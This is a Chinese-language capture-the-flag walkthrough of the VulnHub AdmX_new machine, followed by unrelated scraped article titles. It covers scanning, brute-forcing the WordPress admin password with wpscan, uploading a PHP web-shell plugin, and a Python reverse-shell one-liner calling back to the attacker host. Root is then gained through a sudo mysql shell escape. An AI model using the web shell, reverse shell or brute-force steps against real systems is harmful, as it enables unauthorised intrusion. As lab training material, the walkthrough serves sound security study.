靶机: AdmX_new
靶机: AdmX_new
准备阶段
靶机:https://download.vulnhub.com/admx/AdmX_new.7z
下载后进行 MD5:2948034da23a8acc1285fd40ffcde827 校验,校验目的是确认下载文件有没有损坏或者存在问题
- cmd 进行校验:
certutil -hashfile 文件路径 MD5 - powershell 进行校验:
Get-FileHash 文件路径 -Algorithm MD5 | Format-List
- cmd 进行校验:
使用 VirtualBox
网络 Host-Only
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
- kali: NAT + [ Bridged/Host-Only ]
特殊说明: AdmX_new 内部网络存在一定问题需要调整
本次靶机为 Ubuntu-20.4
Ubuntu 网络配置变化
net-tools-->iproute2ifup/down命令系的/etc/network/interfaces弃用,转为netplan命令和基于/etc/netplan/*.yaml的配置文件
关于 netplan 具体情况:https://netplan.io/reference
靶机网络配置调和【请进行快照后进行下列操作】
在靶机开启过程中【还是黑屏状态,过渡 VirtualBox 动画时】长按
Shift进入 Grub 引导界面用上下键移到第二行的恢复模式,按
ero recovery nomodeset ...将其改为rw single init=/bin/bash当然ro recovery nomodeset ...这段后可能会不同,用省略表示一直到行末修改后使用 Ctrl + X 进入单用户模式,如果不是特别明白可以百度【核心目的是通过单用户模式直接以 root 进入靶机】
使用
ip a查看网络状态,找到有问题的网卡名称,我的是enp0s17不熟悉建议先学习 linux 网卡相关内容修改网络配置
vim /etc/netplan/*.yaml在/etc/netplan/下的 yaml 配置文件应该只有一个,我们目标就是它# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
enp0s3:
dhcp4: true
enp0s17:
addresses: [192.168.56.200/24]
gateway4: 192.168.56.1
nameservers:
addresses: [192.168.56.100]
ethernets下是重点,有两个网卡enp0s3是默认不用管,添加的enp0s17是我们之前查看的问题网卡名称enp0s17下addresses是我们直接静态分配的 IPgateway4是网关nameservers下的addresses是 DHCP 服务地址
其中网关和 DHCP 服务地址是 VirtualBox 的 管理 --> 主机虚拟网络管理器 --> 你为靶机在 Host-Only 下使用的那一张网卡,上面有网卡和 DHCP 服务器信息
配置完成 yaml 配置文件后使用命令
netplan apply使配置生效
关于 Ubuntu-20.4 网络配置详解: https://ubuntu.com/server/docs/network-configuration
打靶流程
发现目标
使用 arp-scan 进行,发现目标 192.168.56.200
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:53:45:e0 PCS Systemtechnik GmbH
192.168.56.200 08:00:27:a3:25:25 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.144 seconds (119.40 hosts/sec). 3 responded
- 使用
-I参数指定靶机对接的网络是 eth1 需要指定扫描的接口 使用--interface=参数,此参数简写I
使用 nmap 进行端口扫描,目标靶机的 80 端口是开放的,并且服务是 Apache httpd 2.4.41 的 http 服务
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-31 19:30 CST
Nmap scan report for 192.168.56.200
Host is up (0.0014s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
-A参数是用来进行操作系统及其版本的探测-T4参数是可以加快执行速度
探查靶机 http 服务
使用浏览器对 http://192.168.56.200:80/ 进行访问,会发现它只是一个 Apache httpd 2.4.41 的初始化页面,对此我们应该对 http://192.168.56.200:80/ 爬取是否存在隐藏或未知页面,对此我们使用 dirsearch 进行暴力破解网络服务器中的目录和文件
┌──(kali㉿kali)-[~]
└─$ dirsearch --url=192.168.56.200:80/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-_22-10-31_19-42-33.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-10-31_19-42-33.log
Target: http://192.168.56.200:80/
[19:42:33] Starting:
[19:42:37] 403 - 279B - /.htaccess_orig
[19:42:37] 403 - 279B - /.htaccess.sample
[19:42:37] 403 - 279B - /.htaccess_extra
[19:42:37] 403 - 279B - /.ht_wsr.txt
[19:42:37] 403 - 279B - /.htaccess.orig
[19:42:37] 403 - 279B - /.htaccessBAK
[19:42:37] 403 - 279B - /.htaccess_sc
[19:42:37] 403 - 279B - /.htaccessOLD
[19:42:37] 403 - 279B - /.htaccess.bak1
[19:42:37] 403 - 279B - /.htaccess.save
[19:42:37] 403 - 279B - /.html
[19:42:37] 403 - 279B - /.htm
[19:42:37] 403 - 279B - /.htpasswd_test
[19:42:37] 403 - 279B - /.htpasswds
[19:42:37] 403 - 279B - /.htaccessOLD2
[19:42:37] 403 - 279B - /.httr-oauth
[19:42:39] 403 - 279B - /.php
[19:43:33] 200 - 11KB - /index.html
[19:44:05] 403 - 279B - /server-status/
[19:44:05] 403 - 279B - /server-status
[19:44:18] 403 - 279B - /tools/
[19:44:18] 301 - 316B - /tools -> http://192.168.56.200/tools/
[19:44:28] 200 - 7KB - /wordpress/wp-login.php
[19:44:28] 200 - 8KB - /wordpress/
Task Completed
发现活跃目标 200
http://192.168.56.200:80/index.htmlhttp://192.168.56.200:80/wordpress/wp-login.phphttp://192.168.56.200:80/wordpress
和一个特别的 301
http://192.168.56.200:80/tools
使用火狐访问 http://192.168.56.200:80/wordpress/ 发现加载时间过长,且明显有缺失,通过查看源码我们可以发现是,html 页面中存在错误指向 192.168.159.145 对此需要使用重定向或替换响应内容,下面使用方法
使用 Burp Suite 进行抓包修改响应实现
使用 浏览器插件 Redirector 重定向实现
对了此方法可以解决 googleapis 问题,是在访问外国的网站很多技术类网站还在使用 Google Apis 的服务,用过体验应该能发现那些网站存在部分缺失,原因就是国内无法访问 Google Apis 的服务,但是国内存在镜像站,通过此插件重定向就可以间接访问
使用 Mitmproxy 实现
我们使用 Mitmproxy 实现进行实现
- 确定你的 Kali 否安装 Mitmproxy
- 命令
mitmproxy启动,程序 - 按
ctrl + shift + d可以将 shell 伪终端上下分屏,上方是 Mitmproxy 的 TUI 界面,下方是 Bash 的 CLI 界面,此操作仅是方便你操作,如果知道请忽略 - 在 Mitmproxy 中使用
:键可以进入指令模式,使用set map_remote '|~m GET|//192.168.159.145/|//192.168.56.200/'即可完成重定向 - 在 firefox 中使用代理:
手动代理 --> HTTP 代理代理 IP 地址127.0.0.1:8080 - 再次访问
http://192.168.56.200:80/wordpress/
经过一番探索,发现并没有什么特别的,我们使用 dirsearch 对 http://192.168.56.200:80/wordpress/ 进行爆破
┌──(kali㉿kali)-[~/.mitmproxy]
└─$ dirsearch --url=192.168.56.200:80/wordpress
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-wordpress_22-11-01_12-33-29.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-01_12-33-29.log
Target: http://192.168.56.200:80/wordpress/
[12:33:30] Starting:
[12:33:40] 403 - 279B - /wordpress/.ht_wsr.txt
[12:33:41] 403 - 279B - /wordpress/.htaccess.sample
[12:33:41] 403 - 279B - /wordpress/.htaccess.orig
[12:33:41] 403 - 279B - /wordpress/.htaccess.bak1
[12:33:41] 403 - 279B - /wordpress/.htaccess_extra
[12:33:41] 403 - 279B - /wordpress/.htaccess.save
[12:33:41] 403 - 279B - /wordpress/.htaccess_orig
[12:33:41] 403 - 279B - /wordpress/.htaccessOLD
[12:33:41] 403 - 279B - /wordpress/.htaccess_sc
[12:33:41] 403 - 279B - /wordpress/.htaccessOLD2
[12:33:41] 403 - 279B - /wordpress/.htaccessBAK
[12:33:41] 403 - 279B - /wordpress/.htm
[12:33:41] 403 - 279B - /wordpress/.httr-oauth
[12:33:41] 403 - 279B - /wordpress/.htpasswd_test
[12:33:41] 403 - 279B - /wordpress/.htpasswds
[12:33:41] 403 - 279B - /wordpress/.html
[12:33:46] 403 - 279B - /wordpress/.php
[12:33:55] 301 - 0B - /wordpress/0 -> http://192.168.56.200/wordpress/0/
[12:34:05] 301 - 0B - /wordpress/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://192.168.56.200/wordpress/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[12:34:09] 301 - 0B - /wordpress/New%20folder%20(2) -> http://192.168.56.200/wordpress/New%20folder%20(2
[12:34:09] 301 - 0B - /wordpress/PMA2/index.php -> http://192.168.56.200/wordpress/PMA2/
[12:34:10] 301 - 0B - /wordpress/PMA/index.php -> http://192.168.56.200/wordpress/PMA/
[12:34:28] 301 - 0B - /wordpress/adm/index.php -> http://192.168.56.200/wordpress/adm/
[12:34:29] 302 - 0B - /wordpress/admin -> http://192.168.159.145/wordpress/wp-admin/
[12:34:30] 301 - 0B - /wordpress/admin. -> http://192.168.56.200/wordpress/admin
[12:34:31] 302 - 0B - /wordpress/admin/ -> http://192.168.159.145/wordpress/wp-admin/
[12:34:32] 301 - 0B - /wordpress/admin/index.php -> http://192.168.56.200/wordpress/admin/
[12:34:33] 301 - 0B - /wordpress/admin/mysql/index.php -> http://192.168.56.200/wordpress/admin/mysql/
[12:34:33] 301 - 0B - /wordpress/admin/mysql2/index.php -> http://192.168.56.200/wordpress/admin/mysql2/
... ... ...
... ... ...
[12:38:02] 301 - 0B - /wordpress/wp-register.php -> http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 - 630B - /wordpress/wp-json/wp/v2/users/
[12:38:02] 200 - 96KB - /wordpress/wp-json/
[12:38:02] 302 - 0B - /wordpress/wp-signup.php -> http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 - 49KB - /wordpress/wp-includes/
[12:38:02] 301 - 0B - /wordpress/www/phpMyAdmin/index.php -> http://192.168.56.200/wordpress/www/phpMyAdmin/
[12:38:03] 301 - 0B - /wordpress/xampp/phpmyadmin/index.php -> http://192.168.56.200/wordpress/xampp/phpmyadmin/
[12:38:03] 405 - 42B - /wordpress/xmlrpc.php
- 显然这次大发现,重点关注
200、301状态的内容 - 在此处需要对 WordPress 有一定了解,才能快速反应出应该重点盘查那些内容
- 重点是
/wordpress/wp-login.php的登录界面,登录的是后台管理
此处我们使用针对 WordPress 的工具 wpscan 攻击 http://192.168.56.200/wordpress/ 注意使用 wpscan 需要挂代理
──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ --proxy http://127.0.0.1:8080 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov 1 20:20:27 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:08 <==============================================> (137 / 137) 100.00% Time: 00:00:08
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 1 20:20:46 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 53.828 KB
[+] Data Received: 106.023 KB
[+] Memory used: 193.719 MB
[+] Elapsed time: 00:00:19
- 挂代理是因为之前服务器重定向原因
- 我们发现 WordPress 版本是 version 5.7.1
测试 wpscan 能正常工作后,使用如下命令工具 wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080 爆破 WordPress 后台密码
┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[proxychains] Strict chain ... 127.0.0.1:8080 ... 192.168.56.200:80 ... OK
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov 1 18:41:55 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <==============================================> (137 / 137) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[SUCCESS] - admin / adam14
Trying admin / Adm123 Time: 00:00:01 <==== > (20 / 236) 8.47% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: adam14
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 1 18:42:07 2022
[+] Requests Done: 160
[+] Cached Requests: 30
[+] Data Sent: 49.889 KB
[+] Data Received: 61.955 KB
[+] Memory used: 204.188 MB
[+] Elapsed time: 00:00:12
解析命令
proxychains wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin- proxychains 是代理,这个应该理解
-P参数是爆破密码字典,./password.txt是密码字典-U参数是爆破账号,我们指定用户为admin毕竟我们要管理权
通过爆破发现关键内容密码为
adam14[!] Valid Combinations Found:
| Username: admin, Password: adam14
对于密码字典
- 建议通过网络查找 高质量弱密码字典
- 使用字典生成工具
john,hydra,crunch手动生成 字典量级都比较大- 或 Kali 的自带字典【一般有点差强人意】
上面的爆破流程也可以使用 john , hydra 进行但更佳复杂,使用 wpscan 是针对性攻击,对于渗透时根据目标类型使用针对性的攻击能够更高效
对 WordPress 后台页面攻击方法
目前已知 WordPress 版本是 version 5.7.1 且我们进入其后台管理界面
- media 标签 上传木马
- Appearance -> Theme Editor 标签 404 模板页面注入
- 基于 WordPress 插件攻击
在此我们选择 WordPress 插件攻击,因为操作空间更灵活一些
编写插件,并上传安装到 WordPress 激活
<?php
/*
Plugin Name: WebShell
Plugin URI: https://yunju.blog.csdn.net/
Description: mu
Author: myname
Version: 1.0
Author URI: https://yunju.blog.csdn.net/
*/ if(isset($_GET['cmd'])){
system($_GET['cmd']);
}
?>
?>
在浏览器访问
http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id测试在本地开启对映监听
netcat -nvlp 4444经过测试上面存在
python3尝试使用 Python 反弹 shell
import os,subprocess,socket # 创建套接字
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) # socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM 代表使用面向流的Tcp协议 # 创建通信
s.connect(('192.168.56.111', 4444)) # 重定向,保障通信的输入与输出
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2) # 生成反弹的 shell
p=subprocess.call(["/bin/sh","-i"]) # 使用时压缩上面的代码,以便 exec() 执行
import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
构建
python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'替代
id进行执行
也可以使用 metasploit-framework 进行攻击
┌──(kali㉿kali)-[~/workspace]
└─$ netcat -nlvp 4444 1 ⨯
listening on [any] 4444 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.200] 36466
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wp:/var/www/html/wordpress/wp-content/plugins/shell$
提权
先确定系统信息,使用命令 uname -a
www-data@wp:/var/www/html/wordpress$ uname -a
uname -a
Linux wp 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
既然攻击 WordPress 一定不要忘记查看其配置文件 wp-config.php
www-data@wp:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
- 可以直接知道 MySQL 用户
admin和密码Wp_Admin#123 - 但登录会错误
我们还可以在用户目录查看 ls /home 发现一个用户 wpadmin 我们可以尝试猜测密码之前的 adam14
- 能登录,之后我们可以去
cd ~找到第一个 flag
wpadmin@wp:~$ cd ~ && ls
cd ~ && ls
local.txt
wpadmin@wp:~$ cat local.txt
cat local.txt
153495edec1b606c24947b1335998bd9
二次提权
在对 sudo -l 验证时发现,可以无条件执行 /usr/bin/mysql -u root -D wordpress -p
wpadmin@wp:~$ sudo -l
sudo -l
Matching Defaults entries for wpadmin on wp:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wpadmin may run the following commands on wp:
(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
- 密码猜测依旧是
adam14 - 进入 mysql 中使用
system即可执行 root 级命令 - 在
\! /bin/bash即可使用 root 的 bash
在 root 用户目录下 proof.txt 最后一个 flag 到此打靶就结束了
靶机: AdmX_new的更多相关文章
- CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...
- Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...
- metasploit利用漏洞渗透攻击靶机
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- Fowsniff: 1靶机入侵
一.信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Moonraker:1靶机入侵
0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...
- FourAndSix: 2.01靶机入侵
0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: htt ...
- Typhoon-v1.02 靶机入侵
0x01 前言 Typhoon VM包含多个漏洞和配置错误.Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS ...
- Raven: 2靶机入侵
0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...
随机推荐
- 食道测压结合Manoview软件
我认为是位于食道开始的地方是上食道括约肌(UES):upper esophageal sphincte,吞咽时,此处的压力会有变大.食道结束的地方是食道下括约肌(LES),从这在往下就是胃,一般情况这 ...
- CAD 标注镜像
在代码里用镜像矩阵对标注进行镜像的时候,标注上面的文字也会被镜像掉,我在网上得到一个方法,可以解决这个问题.https://forums.autodesk.com/t5/net/dbtext-and- ...
- 鸿蒙极速入门(一)-HarmonyOS简介
1.华为官网介绍 2.OpenHarmony开源项目 3.技术架构 内核层 内核子系统:采用多内核(Linux内核或者LiteOS)设计,支持针对不同资源受限设备选用适合的OS内核 驱动子系统:驱动框 ...
- 在kubernetes里使用AppArmor限制容器对资源的访问
目录 一.系统环境 二.前言 三.AppArmor简介 四.AppArmor和SELinux的区别 五.使用AppArmor限制nginx程序访问目录 5.1 安装nginx 5.2 修改nginx的 ...
- NOIP模拟98(多校30)
T1 构造字符串 解题思路 不算特别难的题,但是有一点细节... 首先需要并茶几缩一下点,然后判断一下是否合法,由于我们需要字典序最小的,因此我们应当保证一个联通块中标号较小的点为根节点. 那么对于所 ...
- Qt--点击按钮弹出一个对话框
本文简要说明,如何实现点击按钮弹出一个文本框. 1)首先创建工程,我们就创建一个QMainWindow,不选择UI,就好了. 2)然后再单独创建一个C++类文件,最后得到的工程代码如下: 由于在创建m ...
- Docker部署深度学习模型
Docker部署深度学习模型 基础概念 Docker Docker是一个打包.分发和运行应用程序的平台,允许将你的应用程序和应用程序所依赖的整个环境打包在一起.比如我有一个目标检测的项目,我想分享给朋 ...
- ncnn的blob_vkallocator、workspace_vkallocator、staging_vkallocator区别
ncnn::Extractor中有三个成员函数: void set_blob_vkallocator(VkAllocator* allocator); void set_workspace_vkall ...
- minos 1.2 内存虚拟化——guest
首发公号:Rand_cs minos 1.2 内存虚拟化--guest 项目来自乐敏大佬:https://github.com/minosproject/minos 本文继续讲述 minos 中的内存 ...
- java springboot 读取自定义配置文件
java springboot 读取自定义配置文件 application.properties.test.properties maven中引用 : <dependency> <g ...